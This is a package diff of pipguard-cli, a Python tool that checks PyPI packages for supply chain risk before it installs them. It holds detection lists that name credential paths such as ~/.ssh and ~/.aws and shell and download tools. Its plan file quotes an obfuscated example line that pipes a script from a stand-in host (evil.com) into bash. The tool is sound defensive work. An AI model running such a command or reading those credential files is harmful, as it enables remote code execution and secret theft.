pipguard-cli 0.1.0__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,9 @@
1
+ __pycache__/
2
+ *.py[cod]
3
+ *.egg-info/
4
+ dist/
5
+ build/
6
+ .venv/
7
+ venv/
8
+ .env
9
+ *.db
@@ -0,0 +1,8 @@
1
+ Metadata-Version: 2.4
2
+ Name: pipguard-cli
3
+ Version: 0.1.0
4
+ Summary: Supply chain attack prevention for pip installs
5
+ Requires-Python: >=3.10
6
+ Requires-Dist: httpx>=0.27.0
7
+ Requires-Dist: rich>=13.0.0
8
+ Requires-Dist: typer>=0.9.0
@@ -0,0 +1 @@
1
+ __version__ = "0.1.0"
@@ -0,0 +1,116 @@
1
+ import ast
2
+ import io
3
+ import tarfile
4
+ from pathlib import Path
5
+
6
+ import httpx
7
+
8
+ # Files that execute automatically during install or first import
9
+ TARGET_FILES = {"setup.py", "pyproject.toml", "__init__.py"}
10
+
11
+ _NETWORK_PATTERNS = [
12
+ "requests.", "urllib.", "httpx.", "http.client",
13
+ "ftplib", "smtplib", "socket.",
14
+ ]
15
+ _SHELL_PATTERNS = ["os.system", "subprocess.", "commands.getoutput"]
16
+ _HOME_STRINGS = ["~/.ssh", "~/.aws", "~/.config", "~/.gnupg", "~/.netrc"]
17
+
18
+
19
+ class _FlagVisitor(ast.NodeVisitor):
20
+ def __init__(self):
21
+ self.flags: dict[str, bool] = {
22
+ "network_call": False,
23
+ "env_access": False,
24
+ "home_dir_access": False,
25
+ "shell_exec": False,
26
+ "base64_obfuscation": False,
27
+ "dynamic_exec": False,
28
+ }
29
+
30
+ def visit_Call(self, node: ast.Call):
31
+ func_str = ast.unparse(node)
32
+
33
+ if any(p in func_str for p in _NETWORK_PATTERNS):
34
+ self.flags["network_call"] = True
35
+
36
+ # curl/wget buried in string args
37
+ for child in ast.walk(node):
38
+ if isinstance(child, ast.Constant) and isinstance(child.value, str):
39
+ if any(s in child.value for s in ("curl ", "wget ", "http://", "https://")):
40
+ self.flags["network_call"] = True
41
+
42
+ if "os.environ" in func_str or "os.getenv" in func_str:
43
+ self.flags["env_access"] = True
44
+
45
+ if any(p in func_str for p in _SHELL_PATTERNS):
46
+ self.flags["shell_exec"] = True
47
+
48
+ if func_str.startswith("eval(") or func_str.startswith("exec("):
49
+ self.flags["dynamic_exec"] = True
50
+ self.flags["shell_exec"] = True
51
+
52
+ if "base64.b64decode" in func_str or "base64.decodebytes" in func_str:
53
+ self.flags["base64_obfuscation"] = True
54
+
55
+ # getattr-based obfuscation: getattr(os, 'sys'+'tem')(...)
56
+ if (
57
+ isinstance(node.func, ast.Call)
58
+ and isinstance(node.func.func, ast.Name)
59
+ and node.func.func.id == "getattr"
60
+ ):
61
+ self.flags["dynamic_exec"] = True
62
+
63
+ self.generic_visit(node)
64
+
65
+ def visit_Attribute(self, node: ast.Attribute):
66
+ full = ast.unparse(node)
67
+ if "expanduser" in full or ".home()" in full:
68
+ self.flags["home_dir_access"] = True
69
+ self.generic_visit(node)
70
+
71
+ def visit_Constant(self, node: ast.Constant):
72
+ if isinstance(node.value, str):
73
+ if any(node.value.startswith(p) for p in _HOME_STRINGS):
74
+ self.flags["home_dir_access"] = True
75
+ self.generic_visit(node)
76
+
77
+
78
+ def _analyze_source(source: str) -> dict[str, bool]:
79
+ try:
80
+ tree = ast.parse(source)
81
+ except SyntaxError:
82
+ return {}
83
+ visitor = _FlagVisitor()
84
+ visitor.visit(tree)
85
+ return visitor.flags
86
+
87
+
88
+ async def analyze_tarball(tarball_url: str) -> dict[str, bool]:
89
+ """Download source tarball and run AST analysis on install-time files."""
90
+ async with httpx.AsyncClient(timeout=30, follow_redirects=True) as client:
91
+ r = await client.get(tarball_url)
92
+ r.raise_for_status()
93
+
94
+ combined: dict[str, bool] = {
95
+ "network_call": False,
96
+ "env_access": False,
97
+ "home_dir_access": False,
98
+ "shell_exec": False,
99
+ "base64_obfuscation": False,
100
+ "dynamic_exec": False,
101
+ }
102
+
103
+ buf = io.BytesIO(r.content)
104
+ with tarfile.open(fileobj=buf, mode="r:gz") as tar:
105
+ for member in tar.getmembers():
106
+ if Path(member.name).name not in TARGET_FILES:
107
+ continue
108
+ f = tar.extractfile(member)
109
+ if f is None:
110
+ continue
111
+ source = f.read().decode("utf-8", errors="ignore")
112
+ for key, val in _analyze_source(source).items():
113
+ if val:
114
+ combined[key] = True
115
+
116
+ return combined
@@ -0,0 +1,51 @@
1
+ import json
2
+ import sqlite3
3
+ import time
4
+ from pathlib import Path
5
+
6
+ CACHE_DIR = Path.home() / ".pipguard"
7
+ CACHE_DB = CACHE_DIR / "cache.db"
8
+
9
+ TTL_TRUST = 86_400 # 24 hours
10
+ TTL_VULN = 21_600 # 6 hours
11
+
12
+
13
+ def _conn() -> sqlite3.Connection:
14
+ CACHE_DIR.mkdir(exist_ok=True)
15
+ con = sqlite3.connect(CACHE_DB)
16
+ con.execute("""
17
+ CREATE TABLE IF NOT EXISTS cache (
18
+ key TEXT PRIMARY KEY,
19
+ value TEXT NOT NULL,
20
+ expires_at REAL NOT NULL
21
+ )
22
+ """)
23
+ con.commit()
24
+ return con
25
+
26
+
27
+ def get(key: str) -> dict | None:
28
+ with _conn() as con:
29
+ row = con.execute(
30
+ "SELECT value, expires_at FROM cache WHERE key = ?", (key,)
31
+ ).fetchone()
32
+ if row is None:
33
+ return None
34
+ value, expires_at = row
35
+ if time.time() > expires_at:
36
+ return None
37
+ return json.loads(value)
38
+
39
+
40
+ def set(key: str, value: dict, ttl: int) -> None:
41
+ with _conn() as con:
42
+ con.execute(
43
+ "INSERT OR REPLACE INTO cache (key, value, expires_at) VALUES (?, ?, ?)",
44
+ (key, json.dumps(value), time.time() + ttl),
45
+ )
46
+
47
+
48
+ def clear_vuln() -> None:
49
+ """Wipe all CVE/vulnerability cache entries (for pipguard update --force)."""
50
+ with _conn() as con:
51
+ con.execute("DELETE FROM cache WHERE key LIKE 'osv:%'")
@@ -0,0 +1,90 @@
1
+ from rich.console import Console
2
+ from rich.table import Table
3
+
4
+ console = Console()
5
+
6
+ _VERDICT_COLOR = {"LOW": "green", "MEDIUM": "yellow", "HIGH": "red"}
7
+ _VERDICT_LABEL = {"LOW": "LOW RISK", "MEDIUM": "MEDIUM RISK", "HIGH": "HIGH RISK"}
8
+
9
+
10
+ def show_report(
11
+ package: str,
12
+ metadata: dict,
13
+ download_stats: dict,
14
+ vulns: list[dict],
15
+ analysis_flags: dict,
16
+ breakdown: dict,
17
+ cached: bool = False,
18
+ ) -> None:
19
+ cache_note = " [dim](cached)[/dim]" if cached else ""
20
+ console.print(f"\nAnalyzing [bold]{package}[/bold]{cache_note}...\n")
21
+
22
+ # ── Trust score ──────────────────────────────────────────────
23
+ console.rule("[bold]TRUST SCORE[/bold]")
24
+ t = Table(box=None, show_header=False, padding=(0, 2))
25
+ t.add_column(width=28)
26
+ t.add_column()
27
+
28
+ age = metadata.get("age_days")
29
+ age_str = f"{age}d" if age is not None else "unknown"
30
+ if age is None:
31
+ age_icon = "❓"
32
+ elif age < 30:
33
+ age_icon = "🔴"
34
+ elif age < 90:
35
+ age_icon = "⚠️"
36
+ else:
37
+ age_icon = "✅"
38
+ t.add_row("Package age:", f"{age_str} {age_icon}")
39
+
40
+ t.add_row(
41
+ "GitHub repo:",
42
+ "✅ linked" if metadata.get("github_url") else "🔴 none",
43
+ )
44
+
45
+ spike = download_stats.get("spike_pct")
46
+ last_month = download_stats.get("last_month") or 0
47
+ if spike and spike > 300 and last_month < 50_000:
48
+ t.add_row("Download spike:", f"+{spike:.0f}% ⚠️")
49
+ else:
50
+ t.add_row("Download spike:", "normal ✅")
51
+
52
+ if vulns:
53
+ t.add_row("Known vulns:", f"🔴 {len(vulns)} found ({vulns[0]['id']})")
54
+ else:
55
+ t.add_row("Known vulns:", "✅ none")
56
+
57
+ console.print(t)
58
+
59
+ # ── Code analysis ────────────────────────────────────────────
60
+ console.rule("[bold]CODE ANALYSIS[/bold]")
61
+
62
+ if not analysis_flags:
63
+ console.print(" [dim]No source tarball available — code analysis skipped[/dim]")
64
+ else:
65
+ a = Table(box=None, show_header=False, padding=(0, 2))
66
+ a.add_column(width=28)
67
+ a.add_column()
68
+
69
+ def flag_row(label: str, key: str):
70
+ found = analysis_flags.get(key, False)
71
+ a.add_row(label, "🔴 FOUND" if found else "✅ NOT FOUND")
72
+
73
+ flag_row("Network requests:", "network_call")
74
+ flag_row("Env var access:", "env_access")
75
+ flag_row("Shell execution:", "shell_exec")
76
+ flag_row("Base64 obfuscation:", "base64_obfuscation")
77
+ flag_row("Home dir access:", "home_dir_access")
78
+ console.print(a)
79
+
80
+ # ── Verdict ──────────────────────────────────────────────────
81
+ verdict = breakdown["verdict"]
82
+ score = breakdown["score"]
83
+ color = _VERDICT_COLOR[verdict]
84
+ console.rule()
85
+ console.print(
86
+ f" VERDICT: [{color}]{_VERDICT_LABEL[verdict]}[/{color}]"
87
+ f" (Score: [bold]{score}[/bold])"
88
+ )
89
+ console.rule()
90
+ console.print()
@@ -0,0 +1,66 @@
1
+ import re
2
+
3
+ import httpx
4
+
5
+ # Classifiers that indicate a package has no business making network calls at install time
6
+ PURE_PYTHON_CLASSIFIERS = {
7
+ "Programming Language :: Python :: Implementation :: CPython",
8
+ "Topic :: Utilities",
9
+ "Topic :: Text Processing",
10
+ "Topic :: Software Development :: Libraries :: Python Modules",
11
+ }
12
+
13
+ # Classifiers where network calls are plausible
14
+ NETWORK_CLASSIFIERS = {
15
+ "Topic :: Internet :: WWW/HTTP",
16
+ "Topic :: System :: Networking",
17
+ "Topic :: Scientific/Engineering :: Artificial Intelligence",
18
+ "Topic :: Software Development :: Build Tools",
19
+ }
20
+
21
+ _NETWORK_KEYWORDS = [
22
+ "download", "binary", "binaries", "pre-built", "native extension",
23
+ "model weights", "fetches", "auto-update", "update check",
24
+ ]
25
+ _PURE_KEYWORDS = ["pure python", "pure-python", "zero dependencies", "no network", "offline"]
26
+
27
+
28
+ def classify_from_classifiers(classifiers: list[str]) -> str:
29
+ """
30
+ Returns 'pure_python', 'network_expected', or 'ambiguous' based on PyPI classifiers.
31
+ This is free — classifiers are already in the PyPI JSON response.
32
+ """
33
+ classifier_set = set(classifiers)
34
+ has_pure = bool(classifier_set & PURE_PYTHON_CLASSIFIERS)
35
+ has_network = bool(classifier_set & NETWORK_CLASSIFIERS)
36
+
37
+ if has_pure and not has_network:
38
+ return "pure_python"
39
+ if has_network:
40
+ return "network_expected"
41
+ return "ambiguous"
42
+
43
+
44
+ async def fetch_readme_classification(github_url: str) -> str:
45
+ """
46
+ Only called when classifiers are ambiguous or network_expected.
47
+ Returns 'network_expected', 'pure_python', or 'unknown'.
48
+ """
49
+ match = re.match(r"https://github\.com/([^/]+/[^/\s]+)", github_url)
50
+ if not match:
51
+ return "unknown"
52
+
53
+ repo = match.group(1).rstrip("/")
54
+ readme_url = f"https://raw.githubusercontent.com/{repo}/HEAD/README.md"
55
+
56
+ async with httpx.AsyncClient(timeout=10) as client:
57
+ r = await client.get(readme_url)
58
+ if r.status_code != 200:
59
+ return "unknown"
60
+ text = r.text.lower()
61
+
62
+ if any(kw in text for kw in _NETWORK_KEYWORDS):
63
+ return "network_expected"
64
+ if any(kw in text for kw in _PURE_KEYWORDS):
65
+ return "pure_python"
66
+ return "unknown"
@@ -0,0 +1,322 @@
1
+ import asyncio
2
+ import subprocess
3
+ import sys
4
+ from pathlib import Path
5
+ from typing import Optional
6
+
7
+ import typer
8
+ from rich.prompt import Confirm
9
+
10
+ from pipguard import analyzer, cache, display, github, osv, pypi, scorer
11
+ from pipguard.display import console
12
+
13
+ app = typer.Typer(
14
+ help="pipguard — supply chain attack prevention for pip installs.",
15
+ add_completion=False,
16
+ )
17
+
18
+
19
+ async def _analyze(package: str, version: str | None, no_cache: bool) -> tuple[dict, bool]:
20
+ """Core analysis pipeline. Returns (result_dict, was_cached)."""
21
+ cache_key = f"full:{package}:{version or 'latest'}"
22
+
23
+ if not no_cache:
24
+ cached = cache.get(cache_key)
25
+ if cached:
26
+ return cached, True
27
+
28
+ # Fetch metadata first to resolve the exact version, then query OSV with it
29
+ metadata = await pypi.fetch_metadata(package, version)
30
+ download_stats, vulns = await asyncio.gather(
31
+ pypi.fetch_download_stats(package),
32
+ osv.check_vulns(package, metadata["version"]),
33
+ )
34
+
35
+ # Classifier gating: decide whether to call GitHub README
36
+ classifier_context = github.classify_from_classifiers(metadata["classifiers"])
37
+ readme_context = "unknown"
38
+
39
+ if classifier_context in ("ambiguous", "network_expected") and metadata.get("github_url"):
40
+ readme_context = await github.fetch_readme_classification(metadata["github_url"])
41
+
42
+ # Layer 2: AST analysis — only if source tarball exists
43
+ analysis_flags: dict = {}
44
+ if metadata.get("tarball_url"):
45
+ analysis_flags = await analyzer.analyze_tarball(metadata["tarball_url"])
46
+
47
+ breakdown = scorer.compute(
48
+ metadata, download_stats, vulns, analysis_flags, classifier_context, readme_context
49
+ )
50
+
51
+ result = {
52
+ "metadata": metadata,
53
+ "download_stats": download_stats,
54
+ "vulns": vulns,
55
+ "analysis_flags": analysis_flags,
56
+ "breakdown": breakdown,
57
+ }
58
+
59
+ cache.set(cache_key, result, cache.TTL_TRUST)
60
+ return result, False
61
+
62
+
63
+ @app.command()
64
+ def install(
65
+ package: str = typer.Argument(..., help="Package to analyze and install"),
66
+ version: Optional[str] = typer.Option(None, "--version", "-v", help="Specific version"),
67
+ no_cache: bool = typer.Option(False, "--no-cache", help="Bypass cache for this run"),
68
+ yes: bool = typer.Option(False, "--yes", "-y", help="Skip confirmation prompt"),
69
+ ):
70
+ """Analyze a package for supply chain risks, then install it."""
71
+ try:
72
+ result, cached = asyncio.run(_analyze(package, version, no_cache))
73
+ except Exception as e:
74
+ console.print(f"[red]Analysis failed: {e}[/red]")
75
+ raise typer.Exit(1)
76
+
77
+ display.show_report(
78
+ package,
79
+ result["metadata"],
80
+ result["download_stats"],
81
+ result["vulns"],
82
+ result["analysis_flags"],
83
+ result["breakdown"],
84
+ cached=cached,
85
+ )
86
+
87
+ verdict = result["breakdown"]["verdict"]
88
+
89
+ if verdict == "HIGH" and not yes:
90
+ if not Confirm.ask("Proceed anyway?", default=False):
91
+ raise typer.Exit(1)
92
+ elif verdict == "MEDIUM" and not yes:
93
+ if not Confirm.ask("Proceed anyway?", default=True):
94
+ raise typer.Exit(1)
95
+
96
+ pkg_spec = f"{package}=={result['metadata']['version']}"
97
+ console.print(f"Installing [bold]{pkg_spec}[/bold]...")
98
+ subprocess.run([sys.executable, "-m", "pip", "install", pkg_spec], check=True)
99
+
100
+
101
+ @app.command()
102
+ def info(
103
+ package: str = typer.Argument(..., help="Package to inspect"),
104
+ version: Optional[str] = typer.Option(None, "--version", "-v"),
105
+ no_cache: bool = typer.Option(False, "--no-cache"),
106
+ ):
107
+ """Show a risk report without installing."""
108
+ try:
109
+ result, cached = asyncio.run(_analyze(package, version, no_cache))
110
+ except Exception as e:
111
+ console.print(f"[red]Analysis failed: {e}[/red]")
112
+ raise typer.Exit(1)
113
+
114
+ display.show_report(
115
+ package,
116
+ result["metadata"],
117
+ result["download_stats"],
118
+ result["vulns"],
119
+ result["analysis_flags"],
120
+ result["breakdown"],
121
+ cached=cached,
122
+ )
123
+
124
+
125
+ @app.command()
126
+ def scan(
127
+ file: str = typer.Option("requirements.txt", "--file", "-f", help="Requirements file"),
128
+ ci: bool = typer.Option(False, "--ci", help="Non-interactive CI mode"),
129
+ fail_on: str = typer.Option("high", "--fail-on", help="Fail threshold: medium or high"),
130
+ no_cache: bool = typer.Option(False, "--no-cache"),
131
+ ):
132
+ """Scan all packages in a requirements file."""
133
+ req_path = Path(file)
134
+ if not req_path.exists():
135
+ console.print(f"[red]File not found: {file}[/red]")
136
+ raise typer.Exit(1)
137
+
138
+ packages: list[tuple[str, str | None]] = []
139
+ for line in req_path.read_text().splitlines():
140
+ line = line.strip()
141
+ if not line or line.startswith("#"):
142
+ continue
143
+ if "==" in line:
144
+ name, ver = line.split("==", 1)
145
+ packages.append((name.strip(), ver.strip()))
146
+ else:
147
+ packages.append((line, None))
148
+
149
+ fail_score = {"medium": 31, "high": 61}.get(fail_on.lower(), 61)
150
+ exit_code = 0
151
+
152
+ for name, ver in packages:
153
+ console.print(f"[dim]Scanning {name}...[/dim]")
154
+ try:
155
+ result, cached = asyncio.run(_analyze(name, ver, no_cache))
156
+ bd = result["breakdown"]
157
+ if bd["score"] >= fail_score:
158
+ display.show_report(
159
+ name,
160
+ result["metadata"],
161
+ result["download_stats"],
162
+ result["vulns"],
163
+ result["analysis_flags"],
164
+ bd,
165
+ cached=cached,
166
+ )
167
+ if ci:
168
+ exit_code = 1
169
+ else:
170
+ verdict = bd["verdict"]
171
+ color = {"LOW": "green", "MEDIUM": "yellow", "HIGH": "red"}[verdict]
172
+ console.print(f" [{color}]{verdict}[/{color}] {name} (score: {bd['score']})")
173
+ except Exception as e:
174
+ console.print(f"[yellow] Warning: could not scan {name}: {e}[/yellow]")
175
+
176
+ if ci and exit_code:
177
+ raise typer.Exit(exit_code)
178
+
179
+
180
+ @app.command()
181
+ def history():
182
+ """Show recent scan results from the local cache."""
183
+ import json
184
+ import sqlite3
185
+
186
+ if not cache.CACHE_DB.exists():
187
+ console.print("No scan history yet.")
188
+ return
189
+
190
+ con = sqlite3.connect(cache.CACHE_DB)
191
+ rows = con.execute(
192
+ "SELECT key, value FROM cache WHERE key LIKE 'full:%' ORDER BY expires_at DESC LIMIT 20"
193
+ ).fetchall()
194
+ con.close()
195
+
196
+ if not rows:
197
+ console.print("No scan history yet.")
198
+ return
199
+
200
+ from rich.table import Table
201
+
202
+ t = Table(title="Recent Scans", show_lines=False)
203
+ t.add_column("Package")
204
+ t.add_column("Version")
205
+ t.add_column("Score", justify="right")
206
+ t.add_column("Verdict")
207
+
208
+ for key, value in rows:
209
+ data = json.loads(value)
210
+ bd = data.get("breakdown", {})
211
+ _, pkg, ver = key.split(":", 2)
212
+ verdict = bd.get("verdict", "?")
213
+ score = bd.get("score", "?")
214
+ color = {"LOW": "green", "MEDIUM": "yellow", "HIGH": "red"}.get(verdict, "white")
215
+ t.add_row(pkg, ver, str(score), f"[{color}]{verdict}[/{color}]")
216
+
217
+ console.print(t)
218
+
219
+
220
+ @app.command()
221
+ def update(
222
+ force: bool = typer.Option(False, "--force", help="Wipe and refresh all CVE cache entries"),
223
+ ):
224
+ """Manage the pipguard cache."""
225
+ if force:
226
+ cache.clear_vuln()
227
+ console.print(
228
+ "[green]CVE cache cleared.[/green] Fresh vulnerability data will be fetched on next scan."
229
+ )
230
+ else:
231
+ console.print("Use [bold]pipguard update --force[/bold] to refresh CVE cache immediately.")
232
+
233
+
234
+ @app.command()
235
+ def configure():
236
+ """Set up automatic pip interception for your shell."""
237
+ import os
238
+ import platform
239
+
240
+ BASH_ZSH_FUNC = """
241
+ # pipguard — intercept pip install
242
+ pip() {
243
+ if [ "$1" = "install" ]; then
244
+ pipguard install "${@:2}"
245
+ else
246
+ command pip "$@"
247
+ fi
248
+ }
249
+ """
250
+
251
+ FISH_FUNC = """
252
+ # pipguard — intercept pip install
253
+ function pip
254
+ if test "$argv[1]" = "install"
255
+ pipguard install $argv[2..]
256
+ else
257
+ command pip $argv
258
+ end
259
+ end
260
+ """
261
+
262
+ POWERSHELL_FUNC = """
263
+ # pipguard — intercept pip install
264
+ function pip {
265
+ if ($args[0] -eq "install") {
266
+ pipguard install @($args | Select-Object -Skip 1)
267
+ } else {
268
+ & (Get-Command pip -CommandType Application | Select-Object -First 1).Source @args
269
+ }
270
+ }
271
+ """
272
+
273
+ MARKER = "# pipguard — intercept pip install"
274
+
275
+ def already_configured(path: Path) -> bool:
276
+ return path.exists() and MARKER in path.read_text()
277
+
278
+ def append_to(path: Path, content: str):
279
+ path.parent.mkdir(parents=True, exist_ok=True)
280
+ with open(path, "a") as f:
281
+ f.write(content)
282
+
283
+ # Detect shell and config file
284
+ if platform.system() == "Windows":
285
+ # PowerShell
286
+ # Use $PROFILE directly — it resolves to the correct path for the running PowerShell version
287
+ ps_profile = Path(os.environ.get("USERPROFILE", str(Path.home()))) / "Documents" / "WindowsPowerShell" / "Microsoft.PowerShell_profile.ps1"
288
+ if already_configured(ps_profile):
289
+ console.print("[yellow]pipguard is already configured in your PowerShell profile.[/yellow]")
290
+ return
291
+ append_to(ps_profile, POWERSHELL_FUNC)
292
+ console.print(f"[green]Done![/green] Added pip interceptor to:\n {ps_profile}")
293
+ console.print("\nReload your shell or run:")
294
+ console.print(" [bold]. $PROFILE[/bold]")
295
+
296
+ else:
297
+ shell = os.environ.get("SHELL", "")
298
+ if "zsh" in shell:
299
+ config = Path.home() / ".zshrc"
300
+ func = BASH_ZSH_FUNC
301
+ elif "fish" in shell:
302
+ config = Path.home() / ".config" / "fish" / "config.fish"
303
+ func = FISH_FUNC
304
+ else:
305
+ config = Path.home() / ".bashrc"
306
+ func = BASH_ZSH_FUNC
307
+
308
+ if already_configured(config):
309
+ console.print(f"[yellow]pipguard is already configured in {config}[/yellow]")
310
+ return
311
+
312
+ append_to(config, func)
313
+ console.print(f"[green]Done![/green] Added pip interceptor to:\n {config}")
314
+ console.print("\nReload your shell or run:")
315
+ console.print(f" [bold]source {config}[/bold]")
316
+
317
+ console.print("\nFrom now on, [bold]pip install <package>[/bold] will automatically run through pipguard.")
318
+ console.print("To remove, delete the pip() function from the config file shown above.")
319
+
320
+
321
+ if __name__ == "__main__":
322
+ app()
@@ -0,0 +1,19 @@
1
+ import httpx
2
+
3
+ OSV_URL = "https://api.osv.dev/v1/query"
4
+
5
+
6
+ async def check_vulns(package: str, version: str) -> list[dict]:
7
+ payload = {
8
+ "version": version,
9
+ "package": {"name": package, "ecosystem": "PyPI"},
10
+ }
11
+ async with httpx.AsyncClient(timeout=10) as client:
12
+ r = await client.post(OSV_URL, json=payload)
13
+ r.raise_for_status()
14
+ data = r.json()
15
+
16
+ return [
17
+ {"id": v["id"], "summary": v.get("summary", "No description")}
18
+ for v in data.get("vulns", [])
19
+ ]
@@ -0,0 +1,84 @@
1
+ from datetime import datetime, timezone
2
+
3
+ import httpx
4
+
5
+ PYPI_URL = "https://pypi.org/pypi/{package}/json"
6
+ PYPI_VERSION_URL = "https://pypi.org/pypi/{package}/{version}/json"
7
+ PYPISTATS_URL = "https://pypistats.org/api/packages/{package}/recent"
8
+
9
+
10
+ async def fetch_metadata(package: str, version: str | None = None) -> dict:
11
+ url = (
12
+ PYPI_VERSION_URL.format(package=package, version=version)
13
+ if version
14
+ else PYPI_URL.format(package=package)
15
+ )
16
+ async with httpx.AsyncClient(timeout=10) as client:
17
+ r = await client.get(url)
18
+ r.raise_for_status()
19
+ data = r.json()
20
+
21
+ info = data["info"]
22
+ releases = data.get("releases", {})
23
+
24
+ # Earliest release date across all versions
25
+ all_dates = []
26
+ for files in releases.values():
27
+ for f in files:
28
+ if f.get("upload_time"):
29
+ all_dates.append(
30
+ datetime.fromisoformat(f["upload_time"]).replace(tzinfo=timezone.utc)
31
+ )
32
+ first_release = min(all_dates) if all_dates else None
33
+ age_days = (datetime.now(timezone.utc) - first_release).days if first_release else None
34
+
35
+ # GitHub repo from project_urls or home_page
36
+ project_urls = info.get("project_urls") or {}
37
+ candidates = list(project_urls.values()) + [info.get("home_page") or ""]
38
+ github_url = next((u for u in candidates if u and "github.com" in u), None)
39
+
40
+ # Source tarball URL — version-specific endpoint puts files under data["urls"],
41
+ # the non-version endpoint puts them under releases[version]
42
+ target_version = version or info["version"]
43
+ tarball_url = None
44
+ candidate_files = data.get("urls") or releases.get(target_version, [])
45
+ for f in candidate_files:
46
+ if f.get("packagetype") == "sdist":
47
+ tarball_url = f["url"]
48
+ break
49
+
50
+ return {
51
+ "name": info["name"],
52
+ "version": target_version,
53
+ "age_days": age_days,
54
+ "classifiers": info.get("classifiers") or [],
55
+ "github_url": github_url,
56
+ "maintainer": info.get("maintainer") or info.get("author"),
57
+ "tarball_url": tarball_url,
58
+ "release_count": len(releases),
59
+ }
60
+
61
+
62
+ async def fetch_download_stats(package: str) -> dict:
63
+ async with httpx.AsyncClient(timeout=10) as client:
64
+ r = await client.get(PYPISTATS_URL.format(package=package))
65
+ if r.status_code != 200:
66
+ return {"last_week": None, "last_month": None, "spike_pct": None}
67
+ data = r.json()["data"]
68
+
69
+ last_week = data.get("last_week") or 0
70
+ last_month = data.get("last_month") or 0
71
+
72
+ # Expected weekly = monthly / 4; spike = how much this week exceeds that
73
+ expected_weekly = last_month / 4 if last_month else 0
74
+ spike_pct = (
75
+ (last_week - expected_weekly) / expected_weekly * 100
76
+ if expected_weekly > 0
77
+ else None
78
+ )
79
+
80
+ return {
81
+ "last_week": last_week,
82
+ "last_month": last_month,
83
+ "spike_pct": spike_pct,
84
+ }
@@ -0,0 +1,84 @@
1
+ _WEIGHTS = {
2
+ "known_cve": 50,
3
+ "shell_exec": 40,
4
+ "base64_obfuscation": 35,
5
+ "package_new": 30,
6
+ "home_dir_access": 30,
7
+ "network_call_full": 25, # pure Python package making network calls
8
+ "network_call_discounted": 8, # network calls expected for this package type
9
+ "env_access": 20,
10
+ "maintainer_new": 20,
11
+ "download_spike": 15,
12
+ "no_github": 10,
13
+ }
14
+
15
+
16
+ def compute(
17
+ metadata: dict,
18
+ download_stats: dict,
19
+ vulns: list[dict],
20
+ analysis_flags: dict,
21
+ classifier_context: str, # 'pure_python' | 'network_expected' | 'ambiguous'
22
+ readme_context: str, # 'network_expected' | 'pure_python' | 'unknown'
23
+ ) -> dict:
24
+ score = 0
25
+ signals: dict[str, int] = {}
26
+
27
+ def add(label: str, pts: int):
28
+ nonlocal score
29
+ score += pts
30
+ signals[label] = pts
31
+
32
+ if vulns:
33
+ add(f"Known CVE ({vulns[0]['id']})", _WEIGHTS["known_cve"])
34
+
35
+ age_days = metadata.get("age_days")
36
+ if age_days is not None and age_days < 30:
37
+ add(f"Package < 30 days old ({age_days}d)", _WEIGHTS["package_new"])
38
+
39
+ spike_pct = download_stats.get("spike_pct")
40
+ last_month = download_stats.get("last_month") or 0
41
+ if spike_pct and spike_pct > 300 and last_month < 50_000:
42
+ add(f"Download spike +{spike_pct:.0f}%", _WEIGHTS["download_spike"])
43
+
44
+ if not metadata.get("github_url"):
45
+ add("No GitHub repo linked", _WEIGHTS["no_github"])
46
+
47
+ if analysis_flags.get("shell_exec"):
48
+ add("Shell execution in setup.py", _WEIGHTS["shell_exec"])
49
+
50
+ if analysis_flags.get("base64_obfuscation"):
51
+ add("Base64 obfuscation", _WEIGHTS["base64_obfuscation"])
52
+
53
+ if analysis_flags.get("home_dir_access"):
54
+ add("Home directory access", _WEIGHTS["home_dir_access"])
55
+
56
+ if analysis_flags.get("env_access"):
57
+ add("Env variable access", _WEIGHTS["env_access"])
58
+
59
+ if analysis_flags.get("network_call"):
60
+ network_expected = (
61
+ classifier_context == "network_expected"
62
+ or readme_context == "network_expected"
63
+ )
64
+ if classifier_context == "pure_python":
65
+ add(
66
+ "Network call in setup.py (unexpected for pure Python)",
67
+ _WEIGHTS["network_call_full"],
68
+ )
69
+ elif network_expected:
70
+ add(
71
+ "Network call in setup.py (expected for this package type)",
72
+ _WEIGHTS["network_call_discounted"],
73
+ )
74
+ else:
75
+ add("Network call in setup.py", _WEIGHTS["network_call_full"])
76
+
77
+ if score <= 30:
78
+ verdict = "LOW"
79
+ elif score <= 60:
80
+ verdict = "MEDIUM"
81
+ else:
82
+ verdict = "HIGH"
83
+
84
+ return {"score": score, "verdict": verdict, "signals": signals}
@@ -0,0 +1,165 @@
1
+ # pipguard — Plan & Scope
2
+
3
+ > "Know what you're installing before you install it."
4
+
5
+ A CLI tool that intercepts `pip install` and analyzes packages for supply chain attacks before they touch your system. The data to detect malicious packages already exists — PyPI, OSV.dev, GitHub. The gap is workflow integration. Nobody has made checking automatic at the exact moment of install.
6
+
7
+ ---
8
+
9
+ ## The Problem
10
+
11
+ Supply chain attacks are increasing, especially in AI/ML where developers install unfamiliar packages constantly. Attack vectors: typosquatting (`reqeusts`, `nunpy`), dependency confusion, account takeover, slow poisoning (xz utils 2024), maintainer going rogue (colors.js). Common payload: steal API keys/SSH keys, open backdoors — all through `setup.py` which executes automatically on install.
12
+
13
+ ---
14
+
15
+ ## Architecture
16
+
17
+ ### Layer 1 — Trust Score (API calls, no download)
18
+
19
+ | Signal | Source |
20
+ |--------|--------|
21
+ | Package age, version history | PyPI JSON API |
22
+ | Download spike > 300% week-over-week AND total downloads < 50k | pypistats.org |
23
+ | No linked GitHub repo | PyPI JSON API |
24
+ | Maintainer account age, # of other packages | PyPI JSON API |
25
+ | Maintainer changed between versions | PyPI JSON API |
26
+ | Known CVEs | OSV.dev API |
27
+ | GitHub README (only when classifiers are ambiguous) | GitHub API |
28
+
29
+ ### Layer 2 — Static Code Analysis (AST-based)
30
+
31
+ Downloads the source tarball and analyzes `setup.py`, `pyproject.toml`, `__init__.py` — without executing anything.
32
+
33
+ Flags: network requests, env var access (`os.environ`), home dir access (`~/.ssh`, `~/.aws`), shell execution (`subprocess`, `eval`, `exec`), base64 obfuscation, DNS lookups.
34
+
35
+ **Why AST over grep:** AST catches obfuscated patterns grep misses:
36
+ ```python
37
+ getattr(os, 'sys'+'tem')('curl evil.com | bash') # grep misses, AST catches
38
+ ```
39
+
40
+ ---
41
+
42
+ ## Scoring
43
+
44
+ ```
45
+ 0–30 → LOW RISK 31–60 → MEDIUM RISK 61+ → HIGH RISK
46
+ ```
47
+
48
+ | Signal | Points |
49
+ |--------|--------|
50
+ | Known CVE | +50 |
51
+ | Shell execution in setup.py | +40 |
52
+ | Base64 obfuscation | +35 |
